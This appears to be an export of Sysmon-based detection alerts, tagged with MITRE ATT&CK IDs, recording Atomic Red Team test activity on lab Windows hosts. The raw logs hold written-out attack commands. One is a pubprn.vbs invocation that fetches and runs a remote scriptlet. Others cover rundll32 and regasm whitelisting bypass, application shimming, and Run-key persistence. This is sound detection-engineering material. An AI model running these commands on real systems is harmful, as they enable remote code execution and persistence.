+ + + + + + 2019-03-19 20:52:47.054 + 365ABB72-569F-5C91-0000-001012610800 + 2548 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564436045.542307,2019-07-30T01:34:05.542307+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 AllTheThings.dll,EntryPoint )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4967 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:05.475 + 747F3D96-664D-5D3F-0000-00108D5B8C00 + 912 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 AllTheThings.dll,EntryPoint + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-664D-5D3F-0000-0010F1498C00 + 6836 + C:\Windows\System32\cmd.exe + cmd /c rundll32 AllTheThings.dll,EntryPoint + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028746.364512,2019-03-20T00:52:26.364512+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966444 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:26.194 + 365ABB72-568A-5C91-0000-0010D24B0800 + 4072 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436085.660037,2019-07-30T01:34:45.660037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5006 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:45.524 + 747F3D96-6675-5D3F-0000-0010875C8F00 + 4036 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-6675-5D3F-0000-0010AA498F00 + 4184 + C:\Windows\System32\cmd.exe + cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547556.069498,2019-07-19T18:45:56.069498+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "del T1121.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3615 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:56.002 + 747F3D96-D7A4-5D31-0000-0010C9C22900 + 6804 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "del T1121.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547555.699293,2019-07-19T18:45:55.699293+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3613 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.672 + 747F3D96-D7A3-5D31-0000-001081B22900 + 5800 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028745.943907,2019-03-20T00:52:25.943907+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966429 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:52:25.853 + 365ABB72-5689-5C91-0000-0010543F0800 + 3896 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547555.621447,2019-07-19T18:45:55.621447+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3611 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.057 + 747F3D96-D7A3-5D31-0000-0010F2A42900 + 4784 + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe + 4.7.3190.0 built by: NET472REL1LAST_C + Visual C# Command Line Compiler + Microsoft® .NET Framework + Microsoft Corporation + C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ) contain suspicious command ( \csc.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3610 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.023 + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547555.105804,2019-07-19T18:45:55.105804+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3610 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:55.023 + 747F3D96-D7A3-5D31-0000-0010A0A22900 + 6748 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966423 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:45.052 + 365ABB72-55E9-5C91-0000-00102EEB0700 + 2104 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3606 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.251 + 747F3D96-D772-5D31-0000-00107CF02800 + 324 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3603 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.180 + 747F3D96-D772-5D31-0000-001031EB2800 + 6472 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3600 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.056 + 747F3D96-D772-5D31-0000-0010BEE52800 + 3216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3599 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.388 + 747F3D96-D765-5D31-0000-001024C32800 + 4264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3596 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.314 + 747F3D96-D765-5D31-0000-0010D7BD2800 + 5824 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966634 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:13:38.586 + 365ABB72-77A2-5C91-0000-00100A570100 + 1636 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-777F-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-777F-5C91-0000-00100B590000 + 516 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966633 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:13:38.576 + 365ABB72-77A2-5C91-0000-00106D560100 + 1628 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-777F-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-777F-5C91-0000-00100B590000 + 516 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3593 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.201 + 747F3D96-D765-5D31-0000-001027B72800 + 6584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3588 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.337 + 747F3D96-D739-5D31-0000-0010B2C22600 + 6896 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c 